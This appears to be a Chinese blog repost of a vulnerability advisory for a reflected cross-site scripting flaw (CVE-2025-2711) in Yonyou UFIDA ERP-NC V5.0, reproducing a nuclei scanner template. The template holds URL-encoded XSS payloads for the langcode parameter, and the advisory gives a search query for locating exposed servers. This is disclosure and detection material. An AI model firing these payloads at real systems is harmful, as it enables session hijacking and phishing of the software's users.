Yonyou UFIDA ERP-NC V50 跨站脚本漏洞

漏洞信息

漏洞名称: Yonyou UFIDA ERP-NC V5.0 跨站脚本漏洞

漏洞编号:

  • CVE: CVE-2025-2711

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: Yonyou UFIDA ERP-NC V5.0是一款广泛使用的企业资源规划(ERP)软件,主要用于企业管理和业务流程自动化。该软件在企业中部署广泛,支持多种业务功能,包括财务管理、供应链管理和人力资源管理等。此次发现的漏洞属于跨站脚本(XSS)漏洞,具体存在于/help/systop.jsp和/help/top.jsp页面中的langcode参数。由于未对用户输入进行适当的清理和验证,攻击者可以通过构造恶意的langcode参数值,将任意JavaScript代码注入到页面中,进而在用户浏览时执行。这种漏洞的利用可以导致多种安全问题,如会话劫持、钓鱼攻击或其他恶意操作,尽管需要用户交互才能触发,但由于其反射性质,攻击者可以通过诱骗用户点击特制链接来利用此漏洞。漏洞的CVSS评分为6.1,属于中危级别,主要影响数据的机密性和完整性,但不会直接影响系统的可用性。

产品厂商: yonyou

产品名称: ufida_erp-nc

影响版本: 5.0

搜索语法: icon_hash=”1085941792”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b38673edf61c913c076ccb617934c4b75b0327f5/http%2Fcves%2F2025%2FCVE-2025-2711.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: CVE-2025-2711

info:
name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
reference:
- https://github.com/Hebing123/cve/issues/86
- https://nvd.nist.gov/vuln/detail/CVE-2025-2711
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-2711
cwe-id: CWE-79
cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: yonyou
product: ufida_erp-nc
fofa-query: icon_hash="1085941792"
tags: cve,cve2025,xss,erp-nc,ufida,yonyou

http:
- method: GET
path:
- "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E"
- "{{BaseURL}}/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<svg onload=alert(document.domain)>.png)'
- 'Search.jsp'
condition: and

- type: word
part: content_type
words:
- 'text/html'

- type: status
status:
- 200


Yonyou UFIDA ERP-NC V50 跨站脚本漏洞
http://example.com/2025/07/16/github_3203109440/
作者
lianccc
发布于
2025年7月16日
许可协议